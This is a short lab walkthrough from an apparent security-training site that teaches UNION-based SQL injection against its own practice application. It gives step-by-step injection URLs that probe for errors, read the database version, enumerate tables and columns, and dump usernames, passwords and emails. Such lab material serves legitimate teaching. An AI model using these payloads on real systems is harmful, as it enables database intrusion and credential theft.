SBM Labs

Cyber Security Collaboration Project

SQL Injection
08 Feb 2014

The aim of this lab is unauthorized access to the web application database.

For this lab you will need:
1. Web browser Mozilla Firefox.

Go to the lab SQL Injection. HTTP request will be sent to the server using method GET.

Then select the company and send request.

Let's analyze web application behavior on this request https://penlab.sbmlabs.com/sql_injection?company=test'. We will see MySQL error. It indicates the presence of SQL Injection vulnerability.

Let's try to get database version. We will send this request https://penlab.sbmlabs.com/sql_injection?company=test'+union+select+version(),null,'null. After it we will see error about wrong sql request. We should determine the number of the requested fields in the original sql request in order to use operator UNION.

Let's increase the number of the requested fields in UNION request https://penlab.sbmlabs.com/sql_injection?company=test'+union+select+version(),null,null,'null. As a result we will see database version in column Date.

We have approved the presence of SQL Injection. Then we will get the list of database tables https://penlab.sbmlabs.com/sql_injection?company=test'+union+select+group_concat(table_name SEPARATOR ' '),null,null,null+from+information_schema.tables+where+'1'='1.

Then we will get column names in the table USERS https://penlab.sbmlabs.com/sql_injection?company=test'+union+select+group_concat(column_name SEPARATOR ' '),null,null,null+from+information_schema.columns+where+table_name='users.

Then we wiil get data from the table USERS https://penlab.sbmlabs.com/sql_injection?company=test'+union+select+id,username,password,email+from+users+where+'1'='1.

Lab is completed. You should check and filter data in user's request on the server side in order to prevent SQL Injection vulnerability.

Passive XSS